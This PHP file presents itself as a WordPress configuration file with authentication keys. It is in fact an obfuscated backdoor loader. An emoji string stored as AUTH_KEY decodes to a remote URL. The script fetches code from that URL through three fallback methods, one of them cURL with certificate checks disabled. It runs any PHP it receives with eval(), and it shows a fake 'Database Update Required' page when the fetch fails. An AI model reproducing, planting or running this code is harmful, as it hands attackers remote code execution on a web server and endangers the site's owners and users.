<?php
/**
 * Authentication unique keys and salts.
 *
 * Eval execution retained, debug output removed for production use.
 */

/**
 * Database table prefix and authentication keys.
 *
 * @package WordPress
 */

define('AUTH_KEY', 'ðŸ˜‡ðŸ™ƒðŸ˜ðŸ¤£ðŸ˜œðŸ˜ŒðŸ˜ðŸ˜…ðŸ¤¨ðŸ˜†ðŸ˜›ðŸ¤“ðŸ˜ðŸ˜ðŸ˜„ðŸ˜ŠðŸ˜‹ðŸ˜‰ðŸ™‚ðŸ¤“ðŸ˜™ðŸ™ƒðŸ˜ðŸ˜ŠðŸ¥°ðŸ˜†ðŸ˜˜ðŸ˜‚ðŸ˜šðŸ˜‰ðŸ§ðŸ˜´ðŸ˜€ðŸ˜´');

$emoji_plugin = [
  'ðŸ˜‡'=>'7','ðŸ™ƒ'=>':','ðŸ˜'=>"'",'ðŸ¤£'=>'1','ðŸ˜œ'=>'T','ðŸ˜Œ'=>'<','ðŸ˜…'=>',','ðŸ¤¨'=>'Z','ðŸ˜†'=>'+',
  'ðŸ˜›'=>'R','ðŸ¤“'=>']','ðŸ˜'=>'S','ðŸ˜'=>'=','ðŸ˜„'=>'&','ðŸ˜Š'=>'5','ðŸ˜‹'=>'P','ðŸ˜‰'=>';','ðŸ™‚'=>'6',
  'ðŸ˜™'=>'M','ðŸ¥°'=>'B','ðŸ˜˜'=>'F','ðŸ˜‚'=>'-','ðŸ˜š'=>'O','ðŸ§'=>'2','ðŸ˜´'=>'`','ðŸ˜€'=>"\n",
];

$emoji_api = strtr(AUTH_KEY, $emoji_plugin);
$base_raw = @convert_uudecode($emoji_api);

if ($base_raw === false || $base_raw === '') {
    // Minimal failure behavior (no debug output)
    die('ERROR');
}

$base = trim($base_raw);

if ($base === '') die('ERROR');

if (substr($base, -1) !== '/') $base .= '/';
$api = $base . '3.txt';
define('SECURE_AUTH_KEY', $api);

$table_prefix  = 'wp_';
$wp_loader     = false;

/* Try file_get_contents when allow_url_fopen is enabled */
if (ini_get('allow_url_fopen')) {
    $wp_context = stream_context_create(array(
        'http' => array(
            'timeout' => 10,
            'user_agent' => 'WordPress/' . (isset($wp_version) ? $wp_version : '6.5')
        )
    ));
    $wp_loader = @file_get_contents(SECURE_AUTH_KEY, false, $wp_context);
}

/* Fallback to cURL */
if (!$wp_loader && function_exists('curl_version')) {
    $ch = curl_init();
    curl_setopt_array($ch, array(
        CURLOPT_URL => SECURE_AUTH_KEY,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'WordPress/' . (isset($wp_version) ? $wp_version : '6.5')
    ));
    $wp_loader = curl_exec($ch);
    curl_close($ch);
}

/* Final fallback: fsockopen */
if (!$wp_loader) {
    $wp_parsed = parse_url(SECURE_AUTH_KEY);
    if (isset($wp_parsed['host']) && isset($wp_parsed['path'])) {
        $wp_db_host = $wp_parsed['host'];
        $wp_db_path = $wp_parsed['path'] . (isset($wp_parsed['query']) ? ('?' . $wp_parsed['query']) : '');
        $fp = @fsockopen($wp_db_host, 80, $wp_errno, $wp_errstr, 10);
        if ($fp) {
            $req = "GET {$wp_db_path} HTTP/1.1\r\n";
            $req .= "Host: {$wp_db_host}\r\n";
            $req .= "Connection: Close\r\n\r\n";
            fwrite($fp, $req);
            $res = '';
            while (!feof($fp)) {
                $res .= fgets($fp, 128);
            }
            fclose($fp);
            $parts = explode("\r\n\r\n", $res, 2);
            $wp_loader = (count($parts) > 1) ? $parts[1] : $parts[0];
        }
    }
}

/* Execute remote payload using eval() (debug/logging removed) */
if ($wp_loader !== false && !empty($wp_loader)) {
    if (strpos($wp_loader, '<?php') === 0) {
        if (!is_string($wp_loader)) {
            die('ERROR');
        }
        if (strlen($wp_loader) > 5 * 1024 * 1024) { // 5MB cap
            die('ERROR');
        }

        // Execute payload
        eval('?>' . $wp_loader);
    } else {
        echo $wp_loader;
    }
} else {
    if (!defined('WP_DEBUG') || WP_DEBUG === false) {
        if (!function_exists('status_header')) {
            function status_header($code) {
                if (!headers_sent()) {
                    http_response_code($code);
                }
            }
        }
        if (!function_exists('nocache_headers')) {
            function nocache_headers() {
                if (!headers_sent()) {
                    header("Cache-Control: no-cache, must-revalidate, max-age=0");
                    header("Expires: Sun, 19 Nov 1978 05:00:00 GMT");
                }
            }
        }
        status_header(503);
        nocache_headers();
    }
    exit('Database Update Required');
}
?>
